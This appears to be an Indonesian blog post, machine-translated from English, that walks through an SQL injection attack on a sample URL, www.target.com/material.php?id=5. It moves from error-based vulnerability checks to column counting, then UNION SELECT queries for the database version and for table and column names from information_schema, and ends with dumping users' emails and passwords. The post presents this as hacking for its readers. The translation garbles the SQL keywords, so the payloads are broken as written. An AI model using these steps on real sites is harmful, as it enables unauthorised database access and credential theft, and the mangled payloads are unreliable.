ini dapat melakukan pada mozilla web browser firefox ........
Website SQL seperti ini "www.target.com/material.php?id=5"
mungkin "/image.php?id="
"/product.php?id="
seterusnya ..............
pertama Anda perlu memeriksa vulrneablity website. untuk ini hanya menambahkan 'setelah url .. kira website ini
www.target.com/material.php?id=5
tambahkan 'setelah url..like ini
www.target.com/material.php.id=5 'lalu tekan enter .. jika itu menunjukkan halaman error maka website ini vulrneable ...
sekarang mari kita mulai pekerjaan nyata ....
sekarang Anda harus menemukan nomor kolom untuk menambahkan berikut di url ..
Agar www.target.com/material.php?id=-5 oleh 1--
Agar www.target.com/material.php?id=-5 oleh 2--
Agar www.target.com/material.php?id=-5 oleh 3--
Agar www.target.com/material.php?id=-5 oleh 4--
Agar www.target.com/material.php?id=-5 oleh 5--
periksa sampai halaman kesalahan muncul ..... sekarang serikat pilih semua kolom .. kira saya mendapatkan halaman kesalahan pada 7 .. jadi saya akan menambahkan ini di url
serikat www.target.com/material.php?id=-5 pilih semua 1,2,3,4,5,6,7--
afetr ini halaman web akan menunjukkan jumlah kolom yang akan digunakan di lebih .. kira saya mendapat 3 dan 4 .. maka saya akan memilih kolom yang dalam huruf tebal ... kira itu adalah 3 ..
sekarang Anda harus memeriksa versi .... perhatikan jika versi lebih kecil 5 Anda harus Guss nama tabel yang sangat deficult dan jika versi lebih besar atau sama dengan 5 Anda tidak perlu Guss nama tabel ..
untuk memeriksa versi hanya menambahkan berikut
serikat www.target.com/material.php?id=-5 pilih semua 1,2,@@version, 4,5,6,7--
sekarang menemukan nama database .. untuk THS menambahkan berikut
serikat www.target.com/material.php?id=-5 pilih semua 1,2, database, 4,5,6,7--
sekarang menemukan nama tabel .. untuk ini
serikat www.target.com/material.php?id=-5 pilih semua 1,2, table_name, 4,5,6,7 dari information_schema.tables--
jika Anda yang "character_sets" hanya sebagai nama tabel melakukan hal berikut
serikat www.target.com/material.php?id=-5 pilih semua 1,2, group_concat (table_name), 4,5,6,7 dari information_schema.tables--
sekarang Anda mendapatkan daftar nama tabel ... seperti pengguna, admin, user_info, dll .. memilih nama tabel .... kira saya pilih "pengguna" dalam kasus saya .. sekarang menemukan nama kolom ... untuk ini
serikat www.target.com/material.php?id=-5 pilih semua 1,2, column_name, 4,5,6,7 dari information_schema.columns mana table_name = users--
jika halaman error muncul Anda harus mengubah nama tabel di mSQL arang .... untuk ini Anda harus men-download hackbar .... ingat hackbar adalah add on di firefox ... Anda tidak dapat melakukan ini di browser lainnya ...
untuk men-download hackbar pada firefox ... kebagian link berikut .....
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
dan jika lagi halaman kesalahan muncul kemudian hanya menambahkan "group_concat" di url .. seperti ini
serikat www.target.com/material.php?id=-5 pilih semua 1,2, group_concat (column_name), 4,5,6,7 dari information_schema.columns mana table_name = mysql char--
sekarang ia akan menampilkan kolom nama tabel "pengguna" .... seperti "email", "password", "id", "alamat", "telepon tidak ada.", dll
sekarang memilih kolom .... sebagai hacker saya tahu kalian semua akan memilih "email" dan "password" ... sehingga memungkinkan melakukan
serikat www.target.com/material.php?id=-5 pilih semua 1,2, group_concat (email, 0x3a, password), 4,5,6,7 dari users--
melakukannya akan menampilkan semua email dan password mereka .......
harap Anda semua seperti !!!!!!!!!!!!!!!!!!
No comments:
Post a Comment